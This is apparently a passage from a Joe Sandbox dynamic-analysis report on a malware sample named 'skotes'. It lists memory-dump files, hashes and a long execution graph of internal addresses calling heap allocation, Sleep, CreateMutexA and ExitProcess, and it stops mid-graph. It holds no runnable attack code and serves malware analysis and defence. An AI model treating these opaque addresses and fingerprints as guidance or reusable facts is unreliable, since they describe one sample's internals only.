                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: ae0c57848b44451fc6c1ba72eebe80ed49e04c745d8af54e07d0b2eeaf605fa4
                                                                                                                                                                                                        • Instruction ID: 05294e9e3dd99a89ae56f1073232214d9e6ff466a94d9e4b4350517c85ff6070
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae0c57848b44451fc6c1ba72eebe80ed49e04c745d8af54e07d0b2eeaf605fa4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13216732B412099BEB189B68EC8AB6DB766EBD1314F20461DE408973D0C77A9A808753

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:1%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:1886
                                                                                                                                                                                                        Total number of Limit Nodes:9
                                                                                                                                                                                                        execution_graph 9968 9c5a9e 9971 9c5a61 9968->9971 9969 9d80c0 RtlAllocateHeap 9969->9971 9971->9968 9971->9969 9973 9c5bdd 9971->9973 9974 9d7a00 9971->9974 9988 9c5730 9971->9988 9975 9d7a26 9974->9975 9976 9d7a2d 9975->9976 9977 9d7a81 9975->9977 9978 9d7a62 9975->9978 9976->9971 9982 9dd3e2 RtlAllocateHeap 9977->9982 9986 9d7a76 9977->9986 9979 9d7ab9 9978->9979 9980 9d7a69 9978->9980 9983 9c2480 RtlAllocateHeap 9979->9983 9981 9dd3e2 RtlAllocateHeap 9980->9981 9984 9d7a6f 9981->9984 9982->9986 9983->9984 9985 9f6c6a RtlAllocateHeap 9984->9985 9984->9986 9987 9d7ac3 9985->9987 9986->9971 9987->9971 9992 9c5860 9988->9992 9996 9c5799 9988->9996 9989 9c592a 9997 9d8200 9989->9997 9990 9d80c0 RtlAllocateHeap 9990->9996 9993 9f6c6a RtlAllocateHeap 9992->9993 9994 9c5900 9992->9994 9995 9c5934 9993->9995 9994->9971 9996->9989 9996->9990 9996->9992 10000 9dc1d9 9997->10000 9999 9d820a 10003 9dc15d 10000->10003 10002 9dc1ea 10002->9999 10004 9c22e0 RtlAllocateHeap 10003->10004 10005 9dc16f 10004->10005 10005->10002 10006 9c2090 10009 9dd64e 10006->10009 10012 9dd621 10009->10012 10013 9dd637 10012->10013 10014 9dd630 10012->10014 10021 9f98fa 10013->10021 10018 9f988e 10014->10018 10017 9c209a 10019 9f98fa RtlAllocateHeap 10018->10019 10020 9f98a0 10019->10020 10020->10017 10024 9f9630 10021->10024 10023 9f992b 10023->10017 10025 9f963c 10024->10025 10028 9f968b 10025->10028 10027 9f9657 10027->10023 10029 9f96a7 10028->10029 10037 9f971e 10028->10037 10030 9f96fe 10029->10030 10029->10037 10038 9fedf6 10029->10038 10031 9fedf6 RtlAllocateHeap 10030->10031 10030->10037 10033 9f9714 10031->10033 10035 9fadf5 RtlAllocateHeap 10033->10035 10034 9f96f4 10036 9fadf5 RtlAllocateHeap 10034->10036 10035->10037 10036->10030 10037->10027 10039 9fee1e 10038->10039 10040 9fee03 10038->10040 10042 9fee2d 10039->10042 10047 a04fdc 10039->10047 10040->10039 10041 9fee0f 10040->10041 10043 9f75f6 RtlAllocateHeap 10041->10043 10054 a0500f 10042->10054 10046 9fee14 10043->10046 10046->10034 10048 a04fe7 10047->10048 10051 a04ffc 10047->10051 10049 9f75f6 RtlAllocateHeap 10048->10049 10050 a04fec 10049->10050 10052 9f6c5a RtlAllocateHeap 10050->10052 10051->10042 10053 a04ff7 10052->10053 10053->10042 10055 a05027 10054->10055 10056 a0501c 10054->10056 10058 a0502f 10055->10058 10062 a05038 10055->10062 10063 9fb04b 10056->10063 10059 9fadf5 RtlAllocateHeap 10058->10059 10061 a05024 10059->10061 10060 9f75f6 RtlAllocateHeap 10060->10061 10061->10046 10062->10060 10062->10061 10066 9fb059 10063->10066 10064 9f75f6 RtlAllocateHeap 10065 9fb087 10064->10065 10065->10061 10066->10064 10066->10065 10071 9c3c8e 10072 9c3c98 10071->10072 10073 9c3cb4 10072->10073 10090 9c2410 10072->10090 10105 9c3810 10073->10105 10091 9c2424 10090->10091 10109 9db52d 10091->10109 10094 9c3ce0 10095 9c3d42 10094->10095 10097 9c3d52 10094->10097 10211 9d7d50 10095->10211 10098 9dd3e2 RtlAllocateHeap 10097->10098 10099 9c3d84 10098->10099 10100 9d7d50 RtlAllocateHeap 10099->10100 10102 9c3e03 10099->10102 10100->10102 10101 9c3e9b 10101->10073 10102->10101 10103 9f6c6a RtlAllocateHeap 10102->10103 10104 9c3ec1 10103->10104 10106 9c381c 10105->10106 10243 9c2440 10106->10243 10117 9f3aed 10109->10117 10111 9db5a5 10124 9db1ad 10111->10124 10112 9db598 10120 9daf56 10112->10120 10116 9c242a 10116->10094 10128 9f4f29 10117->10128 10119 9db555 10119->10111 10119->10112 10119->10116 10121 9daf9f 10120->10121 10123 9dafb2 10121->10123 10187 9db39f 10121->10187 10123->10116 10125 9db1d8 10124->10125 10126 9db1e1 10124->10126 10127 9db39f 5 API calls 10125->10127 10126->10116 10127->10126 10135 9f4f37 10128->10135 10130 9f4f2e 10130->10119 10134 9f8bfc 10130->10134 10140 9fd634 10130->10140 10161 9f65ed 10134->10161 10136 9f4f40 10135->10136 10137 9f4f43 10135->10137 10136->10130 10138 9f8ba3 RtlAllocateHeap 10137->10138 10139 9f4f77 10137->10139 10138->10139 10139->10130 10141 9fd640 10140->10141 10142 9fa7c8 RtlAllocateHeap 10141->10142 10146 9fd667 10141->10146 10148 9fd66d 10141->10148 10142->10146 10143 9fd6b2 10144 9f75f6 RtlAllocateHeap 10143->10144 10145 9fd6b7 10144->10145 10147 9f6c5a RtlAllocateHeap 10145->10147 10146->10143 10146->10148 10160 9fd69c 10146->10160 10147->10160 10149 9fd81b 10148->10149 10150 9fd726 10148->10150 10152 9fd751 10148->10152 10151 9f65ed 3 API calls 10149->10151 10150->10152 10164 9fd62b 10150->10164 10153 9fd82e 10151->10153 10158 9fd7a5 10152->10158 10152->10160 10167 9fa671 10152->10167 10157 9fd62b 4 API calls 10157->10152 10159 9fa671 4 API calls 10158->10159 10158->10160 10159->10160 10160->10134 10162 9f64c7 3 API calls 10161->10162 10163 9f65fe 10162->10163 10165 9fa671 4 API calls 10164->10165 10166 9fd630 10165->10166 10166->10157 10168 9fa67b 10167->10168 10169 9fd82f RtlAllocateHeap 10168->10169 10170 9fa694 10168->10170 10172 9fa6bc 10169->10172 10171 9fa722 10170->10171 10181 9f8bec 10170->10181 10171->10158 10174 9fa6fc 10172->10174 10175 9fa6c4 10172->10175 10176 9fa49f RtlAllocateHeap 10174->10176 10177 9fadf5 RtlAllocateHeap 10175->10177 10179 9fa707 10176->10179 10177->10170 10180 9fadf5 RtlAllocateHeap 10179->10180 10180->10170 10182 9f8bf1 10181->10182 10183 9fd634 4 API calls 10182->10183 10186 9f8bfc 10182->10186 10183->10186 10184 9f65ed 3 API calls 10185 9f8c2f 10184->10185 10186->10184 10198 9dbedf 10187->10198 10190 9db3e8 10190->10123 10207 9dcc31 10198->10207 10201 9f6cbb 10202 9f6cc7 10201->10202 10203 9fa671 4 API calls 10202->10203 10206 9f6ccc 10203->10206 10204 9f8bec 4 API calls 10205 9f6cf6 10204->10205 10206->10204 10208 9dcc3f InitOnceExecuteOnce 10207->10208 10210 9db3e1 10207->10210 10208->10210 10210->10190 10210->10201 10212 9d7dcb 10211->10212 10213 9d7d62 10211->10213 10216 9c2480 RtlAllocateHeap 10212->10216 10214 9d7d6d 10213->10214 10215 9d7d9c 10213->10215 10214->10212 10217 9d7d74 10214->10217 10218 9d7db9 10215->10218 10221 9dd3e2 RtlAllocateHeap 10215->10221 10219 9d7d7a 10216->10219 10220 9dd3e2 RtlAllocateHeap 10217->10220 10218->10097 10222 9f6c6a RtlAllocateHeap 10219->10222 10224 9d7d83 10219->10224 10220->10219 10223 9d7da6 10221->10223 10230 9d7dd5 10222->10230 10223->10097 10224->10097 10225 9d7f20 10226 9d9270 RtlAllocateHeap 10225->10226 10239 9d7e91 10226->10239 10227 9d7e01 10227->10097 10228 9f6c6a RtlAllocateHeap 10237 9d7f2a 10228->10237 10229 9d7f1b 10231 9c2480 RtlAllocateHeap 10229->10231 10230->10225 10230->10227 10230->10229 10232 9d7ea7 10230->10232 10233 9d7e80 10230->10233 10231->10225 10236 9dd3e2 RtlAllocateHeap 10232->10236 10232->10239 10233->10229 10234 9d7e8b 10233->10234 10235 9dd3e2 RtlAllocateHeap 10234->10235 10235->10239 10236->10239 10238 9d7f61 10237->10238 10240 9f6c6a RtlAllocateHeap 10237->10240 10238->10097 10239->10228 10241 9d7f02 10239->10241 10242 9d7f7c 10240->10242 10241->10097 10246 9db5d6 10243->10246 10245 9c2472 10247 9db5f1 10246->10247 10248 9f8bec 4 API calls 10247->10248 10250 9db658 10247->10250 10249 9db69f 10248->10249 10250->10245 10291 9d8680 10292 9d86e0 10291->10292 10292->10292 10300 9d7760 10292->10300 10294 9d86f9 10296 9d8714 10294->10296 10314 9d8f40 10294->10314 10297 9d8f40 RtlAllocateHeap 10296->10297 10299 9d8769 10296->10299 10298 9d87b1 10297->10298 10301 9d777b 10300->10301 10313 9d7864 10300->10313 10302 9d78f1 10301->10302 10306 9d77ea 10301->10306 10307 9d7811 10301->10307 10312 9d77fb 10301->10312 10301->10313 10303 9d9270 RtlAllocateHeap 10302->10303 10304 9d78f6 10303->10304 10305 9c2480 RtlAllocateHeap 10304->10305 10308 9d78fb 10305->10308 10306->10304 10310 9dd3e2 RtlAllocateHeap 10306->10310 10309 9dd3e2 RtlAllocateHeap 10307->10309 10307->10312 10309->10312 10310->10312 10311 9f6c6a RtlAllocateHeap 10311->10302 10312->10311 10312->10313 10313->10294 10315 9d908e 10314->10315 10316 9d8f6b 10314->10316 10317 9d9270 RtlAllocateHeap 10315->10317 10320 9d8fdc 10316->10320 10321 9d8fb2 10316->10321 10318 9d9093 10317->10318 10319 9c2480 RtlAllocateHeap 10318->10319 10331 9d8fc3 10319->10331 10323 9dd3e2 RtlAllocateHeap 10320->10323 10320->10331 10321->10318 10322 9d8fbd 10321->10322 10325 9dd3e2 RtlAllocateHeap 10322->10325 10323->10331 10324 9f6c6a RtlAllocateHeap 10326 9d909d 10324->10326 10325->10331 10327 9d90b8 10326->10327 10329 9d90be 10326->10329 10330 9c2480 10326->10330 10328 9dd3e2 RtlAllocateHeap 10327->10328 10328->10329 10329->10296 10333 9f38af RtlAllocateHeap 10330->10333 10331->10324 10332 9d904c 10331->10332 10332->10296 10334 9c24c3 10333->10334 10334->10296 10335 9ca682 10336 9ca68a 10335->10336 10337 9ca949 10336->10337 10338 9ca75d 10336->10338 10339 9f6c6a RtlAllocateHeap 10337->10339 10341 9d80c0 RtlAllocateHeap 10338->10341 10340 9ca94e 10339->10340 10342 9f6c6a RtlAllocateHeap 10340->10342 10343 9ca903 10341->10343 10344 9ca953 Sleep CreateMutexA 10342->10344 10345 9ca98e 10344->10345 10346 9c9ab8 10348 9c9acc 10346->10348 10349 9c9b08 10348->10349 10350 9c9b4b 10349->10350 10354 9ca917 10349->10354 10351 9c9b59 10350->10351 10352 9c9b65 10350->10352 10357 9d80c0 RtlAllocateHeap 10351->10357 10353 9d7a00 RtlAllocateHeap 10352->10353 10358 9c9b74 10353->10358 10355 9ca953 Sleep CreateMutexA 10354->10355 10356 9f6c6a RtlAllocateHeap 10354->10356 10361 9ca98e 10355->10361 10356->10355 10359 9ca903 10357->10359 10375 9c5c10 10358->10375 10362 9c9b7c 10426 9c8b30 10362->10426 10364 9c9b8d 10463 9d8220 10364->10463 10366 9c9b9c 10367 9d7a00 RtlAllocateHeap 10366->10367 10368 9c9ca9 10367->10368 10369 9c5c10 4 API calls 10368->10369 10370 9c9cb1 10369->10370 10371 9c8b30 4 API calls 10370->10371 10372 9c9cc2 10371->10372 10373 9d8220 RtlAllocateHeap 10372->10373 10374 9c9cd1 10373->10374 10471 9c5940 10375->10471 10377 9c5c54 10474 9c4b30 10377->10474 10379 9c5d17 10379->10362 10380 9c5c7b 10380->10379 10381 9f6c6a RtlAllocateHeap 10380->10381 10382 9c5d47 10381->10382 10382->10382 10383 9d80c0 RtlAllocateHeap 10382->10383 10385 9c5e3e 10383->10385 10384 9c5ea6 10384->10362 10385->10384 10386 9f6c6a RtlAllocateHeap 10385->10386 10387 9c5ed2 10386->10387 10388 9c5ffe 10387->10388 10389 9f6c6a RtlAllocateHeap 10387->10389 10388->10362 10390 9c601b 10389->10390 10391 9d80c0 RtlAllocateHeap 10390->10391 10392 9c6089 10391->10392 10393 9d80c0 RtlAllocateHeap 10392->10393 10394 9c60bd 10393->10394 10395 9d80c0 RtlAllocateHeap 10394->10395 10396 9c60ee 10395->10396 10397 9d80c0 RtlAllocateHeap 10396->10397 10398 9c611f 10397->10398 10399 9d80c0 RtlAllocateHeap 10398->10399 10401 9c6150 10399->10401 10400 9c65b1 10400->10362 10401->10400 10402 9f6c6a RtlAllocateHeap 10401->10402 10403 9c65dc 10402->10403 10404 9d7a00 RtlAllocateHeap 10403->10404 10405 9c66a6 10404->10405 10406 9c5c10 4 API calls 10405->10406 10407 9c66ac 10406->10407 10408 9c5c10 4 API calls 10407->10408 10409 9c66b1 10408->10409 10481 9c22c0 10409->10481 10411 9c66c9 10412 9d7a00 RtlAllocateHeap 10411->10412 10413 9c6732 10412->10413 10414 9c5c10 4 API calls 10413->10414 10415 9c673d 10414->10415 10416 9c22c0 4 API calls 10415->10416 10425 9c6757 10416->10425 10417 9c6852 10418 9d80c0 RtlAllocateHeap 10417->10418 10420 9c689c 10418->10420 10419 9d7a00 RtlAllocateHeap 10419->10425 10421 9d80c0 RtlAllocateHeap 10420->10421 10424 9c68e3 10421->10424 10422 9c5c10 4 API calls 10422->10425 10423 9c22c0 4 API calls 10423->10425 10424->10362 10425->10417 10425->10419 10425->10422 10425->10423 10427 9c8b7c 10426->10427 10428 9d7a00 RtlAllocateHeap 10427->10428 10429 9c8b8c 10428->10429 10430 9c5c10 4 API calls 10429->10430 10431 9c8b97 10430->10431 10432 9d80c0 RtlAllocateHeap 10431->10432 10433 9c8be3 10432->10433 10434 9d80c0 RtlAllocateHeap 10433->10434 10435 9c8c35 10434->10435 10436 9d8220 RtlAllocateHeap 10435->10436 10439 9c8c47 10436->10439 10437 9c8d01 10437->10364 10438 9f6c6a RtlAllocateHeap 10440 9c8d2d 10438->10440 10439->10437 10439->10438 10441 9d7a00 RtlAllocateHeap 10440->10441 10442 9c8d8f 10441->10442 10443 9c5c10 4 API calls 10442->10443 10444 9c8d9a 10443->10444 10445 9d80c0 RtlAllocateHeap 10444->10445 10446 9c8dec 10445->10446 10447 9d8220 RtlAllocateHeap 10446->10447 10449 9c8dfe 10447->10449 10448 9f6c6a RtlAllocateHeap 10451 9c8eaa 10448->10451 10449->10448 10450 9c8e7e 10449->10450 10450->10364 10452 9d7a00 RtlAllocateHeap 10451->10452 10453 9c8f0f 10452->10453 10454 9c5c10 4 API calls 10453->10454 10455 9c8f1a 10454->10455 10456 9d80c0 RtlAllocateHeap 10455->10456 10457 9c8f6c 10456->10457 10458 9d8220 RtlAllocateHeap 10457->10458 10460 9c8f7e 10458->10460 10459 9c8ffe 10459->10364 10460->10459 10461 9f6c6a RtlAllocateHeap 10460->10461 10462 9c902a 10461->10462 10464 9d8248 10463->10464 10465 9d8292 10463->10465 10464->10465 10466 9d8251 10464->10466 10468 9d82a1 10465->10468 10470 9d8f40 RtlAllocateHeap 10465->10470 10832 9d9280 10466->10832 10468->10366 10469 9d825a 10469->10366 10470->10468 10484 9d7f80 10471->10484 10473 9c596b 10473->10377 10475 9c4dc2 10474->10475 10479 9c4b92 10474->10479 10475->10380 10477 9c4ce5 10477->10475 10478 9d8ca0 RtlAllocateHeap 10477->10478 10478->10477 10479->10477 10499 9f6da6 10479->10499 10504 9d8ca0 10479->10504 10629 9c2280 10481->10629 10485 9d7fc7 10484->10485 10488 9d7f9e 10484->10488 10486 9d80b3 10485->10486 10491 9d803e 10485->10491 10492 9d801b 10485->10492 10487 9d9270 RtlAllocateHeap 10486->10487 10489 9d80b8 10487->10489 10488->10473 10490 9c2480 RtlAllocateHeap 10489->10490 10493 9d80bd 10490->10493 10494 9dd3e2 RtlAllocateHeap 10491->10494 10497 9d802c 10491->10497 10492->10489 10495 9dd3e2 RtlAllocateHeap 10492->10495 10494->10497 10495->10497 10496 9f6c6a RtlAllocateHeap 10496->10486 10497->10496 10498 9d8095 10497->10498 10498->10473 10500 9f6db4 10499->10500 10503 9f6dc2 10499->10503 10519 9f6d19 10500->10519 10503->10479 10505 9d8dc9 10504->10505 10506 9d8cc3 10504->10506 10507 9d9270 RtlAllocateHeap 10505->10507 10510 9d8d2f 10506->10510 10511 9d8d05 10506->10511 10508 9d8dce 10507->10508 10509 9c2480 RtlAllocateHeap 10508->10509 10517 9d8d16 10509->10517 10515 9dd3e2 RtlAllocateHeap 10510->10515 10510->10517 10511->10508 10512 9d8d10 10511->10512 10514 9dd3e2 RtlAllocateHeap 10512->10514 10513 9f6c6a RtlAllocateHeap 10516 9d8dd8 10513->10516 10514->10517 10515->10517 10517->10513 10518 9d8d8b 10517->10518 10518->10479 10524 9f690a 10519->10524 10523 9f6d3d 10523->10479 10525 9f692a 10524->10525 10526 9f6921 10524->10526 10525->10526 10527 9fa671 4 API calls 10525->10527 10532 9f6d52 10526->10532 10528 9f694a 10527->10528 10538 9fb5fb 10528->10538 10533 9f6d8f 10532->10533 10534 9f6d5f 10532->10534 10613 9fb67d 10533->10613 10537 9f6d6e 10534->10537 10608 9fb6a1 10534->10608 10537->10523 10539 9fb60e 10538->10539 10540 9f6960 10538->10540 10539->10540 10546 9ff5ab 10539->10546 10542 9fb628 10540->10542 10543 9fb63b 10542->10543 10544 9fb650 10542->10544 10543->10544 10559 9fe6b1 10543->10559 10544->10526 10547 9ff5b7 10546->10547 10548 9fa671 4 API calls 10547->10548 10549 9ff5c0 10548->10549 10552 9ff606 10549->10552 10555 9ff62c 10549->10555 10551 9ff5ef 10551->10552 10553 9f8bec 4 API calls 10551->10553 10552->10540 10554 9ff62b 10553->10554 10556 9ff63a 10555->10556 10558 9ff647 10555->10558 10557 9ff35f RtlAllocateHeap 10556->10557 10556->10558 10557->10558 10558->10551 10560 9fa671 4 API calls 10559->10560 10561 9fe6bb 10560->10561 10564 9fe5c9 10561->10564 10563 9fe6c1 10563->10544 10565 9fe5d5 10564->10565 10568 9fe5ef 10565->10568 10572 9fadf5 RtlAllocateHeap 10565->10572 10566 9fe5f6 10566->10563 10567 9f8bec 4 API calls 10569 9fe668 10567->10569 10568->10566 10568->10567 10570 9fe6a4 10569->10570 10575 9fa72e 10569->10575 10570->10563 10572->10568 10576 9fa739 10575->10576 10578 9fd82f RtlAllocateHeap 10576->10578 10588 9fa745 10576->10588 10577 9f8bec GetPEB ExitProcess GetPEB RtlAllocateHeap 10579 9fa7c7 10577->10579 10581 9fa769 10578->10581 10580 9fa7be 10589 9fe4b0 10580->10589 10582 9fa7a5 10581->10582 10583 9fa771 10581->10583 10585 9fa49f RtlAllocateHeap 10582->10585 10584 9fadf5 RtlAllocateHeap 10583->10584 10584->10588 10586 9fa7b0 10585->10586 10587 9fadf5 RtlAllocateHeap 10586->10587 10587->10588 10588->10577 10588->10580 10590 9fe5c9 GetPEB ExitProcess GetPEB RtlAllocateHeap 10589->10590 10591 9fe4c3 10590->10591 10592 9fe259 GetPEB ExitProcess GetPEB RtlAllocateHeap 10591->10592 10593 9fe4cb 10592->10593 10594 9fe4dc 10593->10594 10595 9fb04b RtlAllocateHeap 10593->10595 10594->10570 10596 9fe4ed 10595->10596 10597 9fe6c4 GetPEB ExitProcess GetPEB RtlAllocateHeap 10596->10597 10607 9fe51f 10596->10607 10598 9fe512 10597->10598 10600 9fe51a 10598->10600 10603 9fe535 10598->10603 10599 9fadf5 RtlAllocateHeap 10601 9fe52d 10599->10601 10602 9f75f6 RtlAllocateHeap 10600->10602 10601->10570 10602->10607 10604 9fe561 10603->10604 10605 9fadf5 RtlAllocateHeap 10603->10605 10606 9fe14b RtlAllocateHeap 10604->10606 10604->10607 10605->10604 10606->10607 10607->10599 10609 9f690a 4 API calls 10608->10609 10610 9fb6be 10609->10610 10612 9fb6ce 10610->10612 10618 9ff1bf 10610->10618 10612->10537 10614 9fa671 4 API calls 10613->10614 10615 9fb688 10614->10615 10616 9fb5fb 4 API calls 10615->10616 10617 9fb698 10616->10617 10617->10537 10619 9f690a 4 API calls 10618->10619 10620 9ff1df 10619->10620 10621 9fb04b RtlAllocateHeap 10620->10621 10622 9ff29d 10620->10622 10624 9ff232 10620->10624 10621->10624 10622->10612 10625 9ff2c2 10624->10625 10626 9ff2ce 10625->10626 10627 9ff2df 10625->10627 10626->10627 10628 9fadf5 RtlAllocateHeap 10626->10628 10627->10622 10628->10627 10630 9c2296 10629->10630 10633 9f87f8 10630->10633 10636 9f7609 10633->10636 10635 9c22a4 10635->10411 10637 9f7649 10636->10637 10638 9f7631 10636->10638 10637->10638 10640 9f7651 10637->10640 10639 9f75f6 RtlAllocateHeap 10638->10639 10642 9f7636 10639->10642 10641 9f690a 4 API calls 10640->10641 10644 9f7661 10641->10644 10643 9f6c5a RtlAllocateHeap 10642->10643 10645 9f7641 10643->10645 10649 9f7bc4 10644->10649 10645->10635 10665 9f868d 10649->10665 10651 9f76e8 10662 9f7a19 10651->10662 10652 9f7be4 10653 9f75f6 RtlAllocateHeap 10652->10653 10654 9f7be9 10653->10654 10655 9f6c5a RtlAllocateHeap 10654->10655 10655->10651 10656 9f7bd5 10656->10651 10656->10652 10672 9f7d15 10656->10672 10680 9f8168 10656->10680 10685 9f7dc2 10656->10685 10690 9f7de8 10656->10690 10719 9f7f36 10656->10719 10663 9fadf5 RtlAllocateHeap 10662->10663 10664 9f7a29 10663->10664 10664->10645 10666 9f86a5 10665->10666 10667 9f8692 10665->10667 10666->10656 10668 9f75f6 RtlAllocateHeap 10667->10668 10669 9f8697 10668->10669 10670 9f6c5a RtlAllocateHeap 10669->10670 10671 9f86a2 10670->10671 10671->10656 10741 9f7d34 10672->10741 10674 9f7d1a 10675 9f7d31 10674->10675 10676 9f75f6 RtlAllocateHeap 10674->10676 10675->10656 10677 9f7d23 10676->10677 10678 9f6c5a RtlAllocateHeap 10677->10678 10679 9f7d2e 10678->10679 10679->10656 10681 9f8178 10680->10681 10682 9f8171 10680->10682 10681->10656 10750 9f7b50 10682->10750 10686 9f7dcb 